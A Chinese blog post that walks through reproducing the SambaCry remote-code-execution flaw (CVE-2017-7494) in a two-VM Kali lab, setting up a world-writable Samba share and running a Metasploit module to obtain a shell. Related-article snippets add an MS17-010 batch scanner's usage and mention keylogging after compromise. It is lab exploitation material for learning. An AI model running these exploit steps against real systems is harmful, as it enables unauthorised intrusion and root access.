linux版本wannacry,Linux版永恒之蓝

最新推荐文章于 2023-04-02 11:31:26 发布
最新推荐文章于 2023-04-02 11:31:26 发布
阅读量280 收藏 1
点赞数
文章标签: linux版本wannacry

66b52468c121889b900d4956032f1009.png

8种机械键盘轴体对比

本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?

漏洞概述

2017年5月24号,Samba官方发布4.6.4版本,声明修复了一个严重漏洞(CVE-2017-7494),可以造成远程代码执行,运行Samba服务的Linux/Unix设备,可能会被直接getshell。

Samba是在Linux或Unix系统上用来实现文件共享和打印服务的通信协议,也是很多家用的智能硬件设备例如NAS设备内置的协议,采用服务端口445。由于Samba内置函数is_known_pipename里面出现字符过滤问题,导致攻击者可以向共享目录传递恶意文件,导致被远程代码执行。

影响版本

Samba 3.5.0 ~ 4.5.10中间的所有版本。

漏洞复现环境

Kali Linux 2018 –> Kali Linux 2017

渗透机:Kali Linux 2018(ip:192.168.31.85)

靶机:Kali Linux 2017(ip:192.168.31.184)

Kali Linux 2017,查看Samba版本1samba --version Version 4.5.8-Debian

88ae517efa4ad13f82face014f0cf985.png

Kali Linux 2017里面创建Samba共享目录1

2mkdir /tmp/public //创建共享目录

chmod 777 /tmp/public //修改读写执行权限

38d8d262b59c606fb60b224a6a7cf61b.png

这是SambaCry漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到Root权限并控制肉鸡。

Kali Linux 2017 修改Samba配置文件1

2

3

4

5

6

7

8

9vim /etc/samba/smb.conf

[public]

comment = public

browseable = yes

writeable = yes

path = /tmp/public

public = yes

read only = no

dade9e8bf5ae7c426f3c74f3e986c8b5.png

Kali Linux 2017 重启/启动Samba服务1

2/etc/init.d/samba restart //重启samba服务

netstat -tnlp samba //查看samba端口状态

39b0a11af297668207e19f31605d9824.png

开始攻击

Kali Linux 2018 进入msf框架,使用SambaCry渗透模块1

2

3msfconsole //进入msf

use exploit/linux/samba/is_known_pipename //使用渗透模块is_known_pipename

info //查看模块信息

0d1f20c1078e0cd189756f464102200a.png1show options //查看模块选项

fc9b51354ac1892c7aaef5b589535528.png1

2set RHOST 192.168.31.184 //设置靶机地址

exploit //开始攻击

11e1f6d1da30dc2506f0ee1792666b77.png

成功拿到shell。

c9f96d96a86b154bafc23d210a219eef.png

参考文章

基少成多
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
批量扫描永恒之蓝-勒索病毒工具
09-30
批量扫描永恒之蓝-勒索病毒工具,可内网,可外网。支持IP、IP段、从文件读取IP列表扫描。 MS_17_010_Scan.exe -ip 10.19.77.69 MS_17_010_Scan.exe -ip 10.19.77.1 10.19.77.254 MS_17_010_Scan.exe -file ip.txt
达梦数据库8,Linux版本
11-10
达梦数据库8,Linux版本;达梦数据库8,Linux版本;达梦数据库8,Linux版本;达梦数据库8,Linux版本;达梦数据库8,Linux版本达梦数据库8,Linux版本;达梦数据库8,Linux版本;达梦数据库8,Linux版本;达梦数据库...
linux版本wannacry,Wannacry勒索软件解决方案
weixin_39603505的博客
04-30 387
1 背景5月12日晚,一款名为Wannacry 的蠕虫勒索软件袭击全球网络,这被认为是迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。 该软件被认为是一种蠕虫变种(也被称为“Wannadecrypt0r”、“wannacryptor”或“ wcry”)。 像其他勒索软件的变种一样,WannaCry也阻止用户访问计算机或文件,要求用户需付费解锁。该勒索软件利用ETERNALBLU...
linux版本wannacry,WannaCry 勒索病毒也能感染 Linux
weixin_32109109的博客
04-30 841
原标题:WannaCry 勒索病毒也能感染 Linux WannaCry 已升级到 2.0 ,与之前版本的不同是,这个变种取消了 Kill Switch,不能通过注册某个域名来关闭变种勒索病毒的传播,该变种传播速度可能会更快。另据卡巴斯基技术人员 Raiu 及其团队分析,WannaCrypt 2.0 的作者另有他人,并不是 WannaCrypt 的初始作者。,尤其是 Windows 旧用户心...
Linux"永恒之蓝”(CVE-2017-7494)复现过程分析
weixin_33923148的博客
09-18 398
本文讲的是Linux"永恒之蓝”(CVE-2017-7494)复现过程分析, 0x01.开始 睡觉睡的正香,在梦里正在做一些不可描述的事情,就被一边的手机吵醒了,真的很想把手机砸掉,但是又舍不得,好几个月的工资呢。拿起来看了看。群里的大牛们开始讨论一个漏洞。曝漏洞了!还睡什么,起来测试了。 0x02 各种失败 当我拿到这个漏洞的时候,做了大量的测试,...
linux samba 永恒之蓝,Samba 漏洞是Linux 永恒之蓝”?看安全人员怎么说
weixin_39934085的博客
05-16 86
雷锋网消息,5月25日,360 技术博客发布了一则博文称,5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间的版本。360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。Samb...
周立功CAN驱动(linux版本
06-15
"CAN驱动"则指代用于连接CAN总线的设备驱动程序,而"linux版本"则明确了这个驱动程序是专门为Linux操作系统编写的,意味着它可以在各种基于Linux内核的发行上运行,如Ubuntu、Debian、CentOS等。 描述中的"周立功...
tomcat8 Linux版本下载
03-21
tomcat8 Linux版本下载 Tomcat 是一个轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。此版本linux的64位版本,解压即使用。非常的方便非常的好用
linux查看minio版本
04-04
linux查看minio版本
chrome安装包linux版本
最新发布
06-11
chrome安装包linux版本
WannaCry 2.0 已能通过 Wine 感染 Linux 系统
欢迎来到我的空间
05-17 658
WannaCry 爆发以来,引起全球恐慌,各大安全机构和用户纷纷通过打补丁、关闭 445 端口等方式加强了旧版本 Windows 系统的防护。然而此病毒的变种正在以人们最易忽略的方式加速渗透传播,长期以对 Windows 病毒免疫著称的 Linux 也有被侵染之势。   根据网络安全公司 Myhackerhouse 联合创始人 hackerfantastic 的测试 发现 ,比特币勒索病毒最新
永恒之蓝-永恒之蓝漏洞(linux
wrypot的博客
04-02 486
读取到的键盘内容被保存在/root/.msf4/loot/20230402110004_default_192.168.132.129_host.windows.key_145354.txt。然后use auxiliary/scanner/smb/smb_ms17_010 使用载荷,这个不是攻击载荷,这个是查看的有没有漏洞的,然后show options。然后run post/windows/capture/keylog_recorderj就可以监听键盘了。搜索载荷,永恒之蓝的载荷是ms17_010。
WannaCry 勒索病毒也能感染 Linux
redditnote的博客
05-15 847
(点击上方公众号,可快速关注)WannaCry 已升级到 2.0 ,与之前版本的不同是,这个变种取消了 Kill Switch,不能通过注册某个域名来关闭变种勒索病毒的...
linux samba 永恒之蓝,Linux永恒之蓝”来袭 360发布Samba漏洞警报
weixin_42511053的博客
05-16 149
Samba是开源共享服务软件,被广泛应用在各种Linux和UNIX系统上,类似于Windows上的SMB服务。最近肆虐的“永恒之蓝”专门攻打Windows的SMB漏洞,此次Samba曝出远程代码执行漏洞主要威胁Linux服务器,一些NAS网络存储产品也受到影响,360提示相关用户尽快进行安全更新。概述2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号...
linux 会不会受到永恒之蓝漏洞,Linux永恒之蓝”远程代码执行漏洞技术分析...
weixin_36070998的博客
05-16 263
原标题:Linux永恒之蓝”远程代码执行漏洞技术分析一、漏洞描述Samba是一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。这个漏洞使得Samba客户端可以主动上传共享库到Samba服务器同时加载并执行该动态库导出函数。攻击者利用漏洞可以进行远程代码执行,具体执行条件如下:1)系统开启了文件/打印机共享端口4452)共享文件夹拥有写入权限3...
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5383
使用Kali Linux Metasploit复现永恒之蓝
网络安全工程师教你Kali Linux:如何防御计算机永恒之蓝勒索病毒?
Kali与编程
09-12 1548
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! Kali Linux渗透篇 利用msf框架对win7进行永恒之蓝渗透【防御篇】 防御ms17_101的方法: 1.安装杀毒软件 2.关闭445端口 3.打开计算机的防火墙功能 防御方式: 一、关闭文件共享 1.1首先我们接着永恒之蓝攻击篇,测试是否能够连接目标电脑。 可以看到我们已经成功连接。 2.1接着我们打开控制面板->网络和 Internet->网络和共享中心->高级共享设置
Linux内核版本详解:基础与选择策略
版本号和次版本号对于判断稳定性至关重要,奇数次版本通常代表测试,偶数次版本则相对稳定。 Linux的核心版本是操作系统的基础,是开发者们不断迭代和改进的基础代码。尽管有稳定和不稳定版本并存,但推荐选择...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值